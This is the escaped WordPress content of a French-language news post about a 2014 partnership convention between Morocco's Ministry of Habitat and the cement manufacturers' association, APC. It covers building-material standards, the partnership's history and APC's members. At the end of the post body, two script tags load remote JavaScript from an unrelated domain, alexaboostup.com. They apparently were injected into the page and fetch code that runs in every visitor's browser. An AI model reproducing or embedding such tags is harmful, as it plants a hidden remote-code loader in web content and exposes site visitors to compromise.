l\u2019Association Professionnelle des Cimentiers a d\u00e9fini les normes de r\u00e9glementation des produits et mat\u00e9riaux de construction.<\/div>\n<\/div>\n<\/div>\n<div>\n<div>\n<div>\n<p>Cette convention de partenariat conforme le cadre contractuel de collaboration existant entre les cimentiers et le Minist\u00e8re tout en renfor\u00e7ant les aspects ayant\u00a0 trait \u00e0 la qualit\u00e9, \u00e0 la s\u00e9curit\u00e9 et \u00e0 la r\u00e9glementation des produits et mat\u00e9riaux de construction.<\/p>\n<p><strong>Les termes du partenariat<\/strong><\/p>\n<p>La nouvelle convention s\u2019attachera \u00e0 accompagner la promulgation du Code de la Construction et de ses textes d\u2019application comme il prendra\u00a0 en compte les nouvelles attributions du Minist\u00e8re en mati\u00e8re de Politique de la Ville dont la valorisation des d\u00e9chets produits par les villes (d\u00e9chets m\u00e9nagers, industriels et gravats de construction), la recherche de solutions innovantes et de mat\u00e9riaux adapt\u00e9s aux besoins (constructions durables, b\u00e9tons paysag\u00e9s, mobiliers urbains, voieries\u2026).<\/p>\n<p>Il es pr\u00e9vu \u00e9galement de d\u00e9cliner dans cet esprit des plans d\u2019actions annuels et des demi-journ\u00e9es techniques de concertation pour la mise en \u0153uvre, le suivis et l\u2019\u00e9valuation par le Comit\u00e9 Mixte pr\u00e9vu \u00e0 cet effet par la dite Convention.<\/p>\n<p><strong>Un partenariat qui remonte \u00e0 l\u2019ann\u00e9e 2000<\/strong><\/p>\n<p>Pour rappel le partenariat entre le Minist\u00e8re de l\u2019Habitat et de la Politique de la Ville et l\u2019Association Professionnelle des Cimentiers (APC) remonte au d\u00e9but des ann\u00e9es 2000. C\u2019est un partenariat\u00a0 caract\u00e9ris\u00e9 par l\u2019appui au Fonds Solidarit\u00e9 Habitat par le biais de la taxe sp\u00e9ciale pr\u00e9lev\u00e9e sur le ciment, la r\u00e9alisation d\u2019\u00e9tudes ayant trait aux pr\u00e9visions de production de logements, la mod\u00e9lisation des co\u00fbts , la contribution \u00e0 l\u2019\u00e9laboration des Chartes nationales de la normalisation et de l\u2019industrialisation sign\u00e9es en 2006.<\/p>\n<p>A ce titre l\u2019appui apport\u00e9 en 2009 au logement social \u00e0 faible VIT par la d\u00e9cote sur le prix du ciment destin\u00e9 aux programmes conventionn\u00e9s a permis l\u2019appui aux structures de formation et de recherche-d\u00e9veloppement et la participation r\u00e9guli\u00e8re aux diff\u00e9rents Salons dont le SIB-Salon International du B\u00e2timent.<\/p>\n<p><strong>L\u2019APC en bref<\/strong><\/p>\n<p>L\u2019Association Professionnelle des cimentiers regroupe l\u2019ensemble des fabricants de ciment et de clinker au Maroc \u00e0 savoir Asment T\u00e9mara, Ciments de l\u2019Atlas, Ciments du Maroc, Holcim Maroc et Lafarge Maroc.<\/p>\n<p>Cr\u00e9\u00e9e en 1982, l\u2019Association a pour mission principale de repr\u00e9senter le secteur cimentier aupr\u00e8s des\u00a0 pouvoirs publics, des institutionnels\u00a0 et des groupements professionnels, de valoriser l\u2019effort accompli\u00a0 par le secteur en mati\u00e8re de qualit\u00e9, s\u00e9curit\u00e9, de protection de l\u2019environnement et d\u2019engagement social.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<p><script type=\"text\/javascript\" src=\"\/\/alexaboostup.com\/plugin\/helper.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/alexaboostup.com\/plugin\/content.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La convention sign\u00e9e le 9 avril 2014 entre le minist\u00e8re de l\u2019Habitat et l\u2019Association Professionnelle des Cimentiers a d\u00e9fini les normes de r\u00e9glementation des produits et mat\u00e9riaux de construction.
